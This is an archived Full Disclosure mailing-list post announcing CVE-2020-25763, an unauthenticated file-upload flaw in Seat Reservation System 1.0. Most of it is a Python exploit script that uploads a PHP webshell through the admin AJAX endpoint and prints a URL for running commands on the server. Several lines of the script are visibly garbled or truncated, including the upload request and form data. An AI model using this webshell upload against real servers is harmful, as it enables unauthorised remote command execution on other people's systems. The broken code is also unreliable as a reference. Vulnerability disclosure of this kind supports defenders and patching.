lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 18 Sep 2020 22:15:25 -0400
From: Ava Tester One <>
Subject: [FD] Seat Reservation System 1.0 Unauthenticated Remote Code
	Execution (CVE-2020-25763)

Seat Reservation System version 1.0 suffers from an Unauthenticated File
Upload Vulnerability allowing Remote Attackers to gain Remote Code
Execution (RCE) on the Hosting Webserver via uploading PHP files.

Vendor Homepage:
Software Link:

Author: Rahul Ramkumar

Date: 2020-09-16

CVE: CVE-2020-25763

# Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code
import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
import random
import string

def print_usage(STRING):
    return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
        print print_usage("Example:\t python %s ''" % sys.argv[0])
    SERVER_URL = sys.argv[1]
    UPLOAD_DIR = 'admin/ajax.php?action=save_movie'
    random = ''.join([random.choice(string.ascii_letters + string.digits)
for n in xrange(16)])
    webshell = random+'.php'

    s = requests.Session()
    s.get(SERVER_URL, verify=False)
    image     = {
                    '<?php echo shell_exec($_GET["d3crypt"]); ?>',
                    {'Content-Disposition': 'form-data'}
    fdata   = {'id':
    r1 =, files=image, data=fdata, verify=False)
    r2 = s.get(SERVER_URL, verify=False)
    response_page = r2.content.decode("utf-8")
    parser = etree.HTMLParser()
    tree = etree.parse(StringIO(response_page), parser=parser)
    def get_links(tree):
        refs = tree.xpath("//img")
        links = [link.get('src', '') for link in refs]
        return [l for l in links]

    links = get_links(tree)
    print('Access your webshell at: ')
    for link in links:
        if webshell in link:
            print(SERVER_URL + link+'?d3crypt=whoami')

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists